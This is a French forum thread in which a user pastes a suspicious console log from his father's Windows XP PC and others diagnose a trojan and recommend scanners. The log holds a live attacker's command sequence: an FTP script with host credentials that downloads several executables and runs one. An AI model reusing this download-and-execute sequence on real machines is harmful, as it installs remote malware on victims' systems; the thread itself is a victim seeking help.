wazza59 Posté(e) le 7 février 2007 Partager Posté(e) le 7 février 2007 salut a tous, je sais pas si c'est la bonne section mais c'est la plus appropriée a ma demande (a mon humble avis) voila, mon père etait sur son ordi lorsqu'il a remarqué quelquechose de bizarre: " Microsoft Windows XP [version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\HP_Administrateur>cd.. C:\Documents and Settings>cd.. C:\> cd windows C:\WINDOWS> cd system32 C:\WINDOWS\system32>echo open ftp.berg.heim.at 21>>c:\ftp C:\WINDOWS\system32>echo 442395>>c:\ftp C:\WINDOWS\system32>echo heim13>>c:\ftp C:\WINDOWS\system32>echo binary>>c:\ftp C:\WINDOWS\system32>echo get kill.exe>>c:\ftp C:\WINDOWS\system32>echo get Fport.exe>>c:\ftp C:\WINDOWS\system32>echo get dqr2.icm>>c:\ftp C:\WINDOWS\system32>echo get ipsec.exe>>c:\ftp C:\WINDOWS\system32>echo QUIT>>c:\ftp C:\WINDOWS\system32> C:\WINDOWS\system32>ftp -s:c:\ftp ftp> open ftp.berg.heim.at 21 Connecté à ftp.berg.heim.at. 220 BERG.HEIM.AT FTP-Server ready. Utilisateur (ftp.berg.heim.at:(none)) : 331 Password required for 442395. 230 Willkommen HEIM.AT Einwohner 442395. ftp> binary 200 Type set to I. ftp> get kill.exe 200 PORT command successful. 150 Opening BINARY mode data connection for kill.exe (21468 bytes). 226 Transfer complete. ftp : 21468 octets reçus en 5,97 secondes à 3,60 Ko/sec. ftp> get Fport.exe 200 PORT command successful. 150 Opening BINARY mode data connection for Fport.exe (114688 bytes). 226 Transfer complete. ftp : 114688 octets reçus en 3,81 secondes à 30,08 Ko/sec. ftp> get dqr2.icm 200 PORT command successful. 150 Opening BINARY mode data connection for dqr2.icm (2937 bytes). 226 Transfer complete. ftp : 2937 octets reçus en 9,03 secondes à 0,33 Ko/sec. ftp> get ipsec.exe 200 PORT command successful. 150 Opening BINARY mode data connection for ipsec.exe (770048 bytes). > ftp: get :Connexion réinitialisée par l'homologue ftp> QUIT C:\WINDOWS\system32>ipsec.exe /s Accès refusé. C:\WINDOWS\system32>ipsec.exe /i Accès refusé. C:\WINDOWS\system32>net start IPSEC " voila, je sais pas ce que c'est donc si vous pouviez m'eclairer bonne soirée Lien vers le commentaire Partager sur d’autres sites More sharing options...
overflow Posté(e) le 7 février 2007 Partager Posté(e) le 7 février 2007 Scanne ton dossier system32 et puis, il a un firewall le pc à ton père .... ? parce que, une application qui fait ca, sans trop savoir par quoi elle a été lancé euh ... je sais pas c'est trop bizarre, moi jte dis SCANNE !!! >>>>>http://www.auditmypc.com/process/fport.asp je pense que c'est un virus/trojan/ver/saloperie Lien vers le commentaire Partager sur d’autres sites More sharing options...
K-m3reon Posté(e) le 7 février 2007 Partager Posté(e) le 7 février 2007 +1 pour le tojan... Lien vers le commentaire Partager sur d’autres sites More sharing options...
wazza59 Posté(e) le 7 février 2007 Auteur Partager Posté(e) le 7 février 2007 analyse en cours avec ad-aware par contre est ce que l'un dentre vous se rappelle du site internet qui analyse les processus en cours et qui nous dit lesquels sont "mechants" ?? Lien vers le commentaire Partager sur d’autres sites More sharing options...
noisette Posté(e) le 7 février 2007 Partager Posté(e) le 7 février 2007 analyse en cours avec ad-aware par contre est ce que l'un dentre vous se rappelle du site internet qui analyse les processus en cours et qui nous dit lesquels sont "mechants" ?? Salut, scans en ligne dans les centralisations antivirus et antispys. Désactive ta restauration système scanne evec HitmanPro et a²-free si possible en mode sans échec installe un pare-feu (vois aussi cette centralisation là). passe un coup de Ccleaner. Aprés, et aprés seulement, poste un rapport HijackThis dans la centralisation du même nom. Tiens au courant. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Thierry 63 Posté(e) le 7 février 2007 Partager Posté(e) le 7 février 2007 Salut, analyse en cours avec ad-aware Mouais ... Analyse ton poste ici > http://webscanner.kaspersky.fr/ Lien vers le commentaire Partager sur d’autres sites More sharing options...
maxsims1 Posté(e) le 7 février 2007 Partager Posté(e) le 7 février 2007 scanne evec HitmanPro et a²-free si possible en mode sans échec Pour a-squared free, toujours penser à bien vérifier les résultats (très performants mais quelques faux positifs). Tu as quoi comme anti-virus ? Lien vers le commentaire Partager sur d’autres sites More sharing options...
wazza59 Posté(e) le 7 février 2007 Auteur Partager Posté(e) le 7 février 2007 un mac affee perimé depuis pas mal de temps le probleme est que cet ordi sert de passerel mais a un probleme avec son disque dur donc il est très très lent (10mn pour afficher le menu demarrer ^^) Lien vers le commentaire Partager sur d’autres sites More sharing options...
Messages recommandés
Archivé
Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.